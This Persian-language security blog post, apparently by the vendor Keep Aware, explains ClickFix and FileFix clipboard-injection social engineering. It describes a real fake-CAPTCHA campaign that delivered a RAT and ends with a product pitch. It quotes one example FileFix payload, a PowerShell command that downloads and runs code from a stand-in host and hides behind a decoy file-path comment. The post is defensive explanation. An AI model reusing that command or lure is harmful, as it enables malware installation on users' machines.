از کلیک تا نفوذ: بررسی دقیق حمله مهندسی اجتماعی Clickfix
نگاهی دقیق به یک کمپین واقعی ClickFix، نسخه بعدی آن (FileFix) و روشهای پیشگیری پیش از به خطر افتادن دستگاه
ClickFix : کپی بیصدا در کلیپبورد
ClickFix یک تکنیک فریبنده مهندسی اجتماعی است که توسط مهاجمان برای فریب کاربران بیاطلاع مورد استفاده قرار میگیرد تا آنها را بهطور ناخودآگاه وادار کنند اجازه دهند یک صفحه وب، بهصورت بیصدا محتوایی را در clipboard سیستم کاربر قرار دهد.
در نهایت، هدف مهاجم این است که کاربر (بیآنکه بداند) کدی مخرب را که از مرورگر جمعآوری و بهطور پنهانی در کلیپبورد سیستم قرار داده شده، روی دستگاه اجرا کند.
این تکنیک برای اولین بار با عنوان ClickFix شناخته شد؛ چرا که پیامهای فریبنده مهندسی اجتماعی به کاربر القا میکردند که باید مشکلی را در مرورگر خود رفع کند و از او میخواستند روی یک عنصر کلیک کند. امروزه این عنوان به هر حمله مشابهی اطلاق میشود؛ حملهای که در آن کاربر روی یک عنصر کلیک میکند، صفحه وب clipboard کاربر را پر میکند و سپس از کاربر میخواهد کد مخرب را در terminal دستگاه خود paste کند.
اسکرینشاتهای بالا نمونهای از یک حمله ClickFix را نمایش میدهند. بهمحض اینکه کاربر روی CAPTCHA جعلی کلیک میکند، صفحه بهصورت بیصدا clipboard کاربر را با کد مخرب پر میکند. سپس از کاربر میخواهد برای اثبات اینکه انسان است، کد موجود را در پنجره Windows Run جایگذاری کند.
حمله در دنیای واقعی: نتیجه جستجوی Google منتهی به تلاش ClickFix
یکی از مشتریان Keep Aware بهتازگی با یک حمله واقعی ClickFix مواجه شد. در حین مرور نتایج موتور جستجو، کاربر روی یک سایت آلوده کلیک کرد. این سایت که با JavaScript مخرب تزریق شده بود، یک پیام ClickFix به کاربر نمایش داد که هدف نهایی آن، استقرار یک Backdoor با نام NetSupportManager RAT بود.
کاربر روی این پیام کلیک کرده و به این ترتیب به صفحه اجازه داد تا clipboard سیستم را با کد مخرب PowerShell پر کند و از کاربر خواست تا آن را در ترمینال دستگاه paste کند.
با این حال، پلتفرم Keep Aware توانست فرمانهای مشکوکی را که صفحه سعی در جایگذاری آنها در clipboard داشت، شناسایی، مسدود و به کاربر هشدار دهد؛ در نتیجه از به خطر افتادن دستگاه جلوگیری شد.
ویدیوی زیر روندی را نشان میدهد که بازدیدکننده در این سایت آلوده تجربه میکند — یک فریم تأیید هویت جعلی (CAPTCHA). پس از کلیک بر روی CAPTCHA جعلی، اسکریپت مخرب JavaScript clipboard کاربر را با کد مخرب PowerShell بهروزرسانی کرده و از او میخواهد آن را در پنجره Windows Run جایگذاری کند.
در این ویدیو، مراحل حمله را مشاهده میکنید در صورتی که حفاظتهای Keep Aware فعال نبودند و clipboard کاربر پاکسازی یا کنترل نمیشد.
اگر این تکنیک مهندسی اجتماعی موفق میشد و هیچ کنترل فنیای وجود نداشت، کاربر بهطور ناخواسته کد مخرب PowerShell را اجرا میکرد.
این امر موجب شروع یک سری دانلودها، رفع ابهام (de-obfuscation)، مونتاژ بدافزار روی دستگاه میزبان و ایجاد قابلیت پایداری (persistence) در کلید Run رجیستری کاربر میشود — که اجازه میدهد بدافزار روی دستگاه آلوده باقی بماند و هر بار که کاربر وارد حساب کاربری خود میشود، اجرا شود.
برای جزئیات دقیقتر این حمله واقعی، شامل مرحله ابتدایی دانلود و کد PowerShell بعدی، میتوانید راهنمای گامبهگام ما را مطالعه کنید.
تاثیر: RATها، Stealerها و موارد بیشتر
حملات ClickFix از JavaScript مخرب، دستکاری clipboard و مهندسی اجتماعی برای دسترسی مهاجم از مرورگر به دستگاه میزبان استفاده میکنند.
این حملات هم در صفحات وب مخرب و هم در سایتهای آلوده مشاهده شدهاند و توسط چندین گروه تهدید برای دسترسی به دستگاههای قربانی به کار رفتهاند، که در نهایت منجر به استقرار بدافزار و Remote Access Trojan (RAT) هایی مانند AsyncRAT، Skuld Stealer، Lumma Stealer، DarkGate، DanaBot Stealer و دیگر موارد شده است.
وقتی این حملات بدون مانع دفاعهای فنی باقی بمانند، این حملات ساده به ظاهر، میتوانند به تسلط کامل روی سیستم منجر شوند و به مهاجم دسترسی از راه دور، دادههای حساس و نقطهپایدار دشوار در شناسایی و حذف بدهند.
نسل بعدی: FileFix
FileFix نسخه بعدی و همخانواده ClickFix است — یک حمله دیگر دستکاری clipboard که برای فریب کاربران به اجرای کد خارج از مرورگر طراحی شده است. این تکنیک برای اولین بار توسط محقق امنیتی mr.d0x در اواخر ژوئن سال جاری مستندسازی شد. FileFix کاربران را فریب میدهد تا دستورات را مستقیماً در نوار آدرس File Explorer جایگذاری کنند و مهاجمان نیز در حال پذیرش این روش جدید هستند.
در نگاه اول، محتوای جایگذاری شده بیخطر به نظر میرسد، مانند یک مسیر فایل استاندارد ویندوز. اما در ابتدای آن یک دستور مخرب پنهان شده است؛ مسیر فایل بعدی در واقع یک کامنت است که تهدید واقعی را مخفی میکند.
Powershell.exe -c "iwr malicious[.]site/mal.jpg|iex" # C:\Organization\Internal\Drive\Business-RFP.pdf
اطلاعات کامل کپی شده در clipboard کاربر، یک دستور مخرب PowerShell است که در انتهای آن یک کامنت حاوی مسیر فایل قرار دارد.
در تصویر زیر توجه کنید که چگونه مسیر فایل ظاهراً بیضرر در نوار آدرس File Explorer، دستور واقعی PowerShell را که از دید کاربر پنهان است، نمایش نمیدهد.
مانند ClickFix، حمله FileFix نیز از مرورگر آغاز میشود و بر مهندسی اجتماعی، تزریق در clipboard و اقدام کاربر برای عبور از مرز بین مرورگر و سیستم میزبان تکیه دارد. در واقع، FileFix نسخهای از ClickFix است که به طور خاص در File Explorer اجرا میشود.
هر دو در بستر مرورگر رخ میدهند.
هر دو از همان تکنیک پرکردن clipboard استفاده میکنند.
هر دو از وبسایتهای مخرب یا آلوده بهره میبرند که خط بین ترافیک معتبر و مخرب را تار میکند.
هر دو منجر به دسترسی مهاجم به دستگاه میزبان میشوند.
این بدان معناست که FileFix نیز مانند ClickFix با دفاعهای بومی مرورگر قابل توقف است. راهحلهای امنیتی مرورگر، مانند Keep Aware، تلاشهای پرکردن clipboard را به صورت بلادرنگ شناسایی و کدهای مشکوک را پیش از رسیدن به سیستم میزبان مسدود میکنند. به همین دلیل، داشتن سیاستهای امنیتی در خود مرورگر تضمین میکند که نفوذها محدود باقی بمانند.
امنیت مرورگر در کانون توجه
حملات ClickFix و FileFix نقطهضعف مهمی در بسیاری از استراتژیهای امنیتی را نشان میدهند: مرورگر به عنوان نقطه ورود به نفوذ به سیستم میزبان. این تکنیکهای مبتنی بر clipboard با مهندسی اجتماعی و سوءاستفاده از تعامل کاربر با وبسایتهای ظاهراً قانونی یا حتی آلوده، کد مخرب را اجرا میکنند.
بدون دید کامل بر فعالیت مرورگر یا کنترل دسترسی به clipboard، دفاعهای سنتی علائم اولیه را از دست میدهند. اما با دید بومی مرورگر و محافظت بلادرنگ clipboard، سازمانها میتوانند این حملات را در منبع خود متوقف کنند، پیش از آنکه کدی روی میزبان اجرا شود.
در Keep Aware، ما بهطور عملی دیدهایم که ابزارهای امنیتی سنتی در حفاظت از مرورگر—که رابط اصلی کارکنان و نقطه هدف مهاجمان است—کافی نیستند. به همین دلیل پلتفرم خود را طراحی کردیم تا حملات مبتنی بر دستکاری clipboard و دیگر حملات مرورگر را پیش از ایجاد آسیب واقعی شناسایی و مسدود کند.
برای کسب اطلاعات بیشتر، میتوانید درخواست دموی محصول را اینجا ثبت کنید.
همچنین، ما مفتخریم که به عنوان یکی از چهار نامزد نهایی بخش Startup Spotlight در Black Hat USA 2025 برای نوآوری انتخاب شدهایم و متعهد به تعریف مجدد روشهای حفاظت و مدیریت مرورگر—محل آغاز کار امروز و نقطه شروع بسیاری از حملات—هستیم.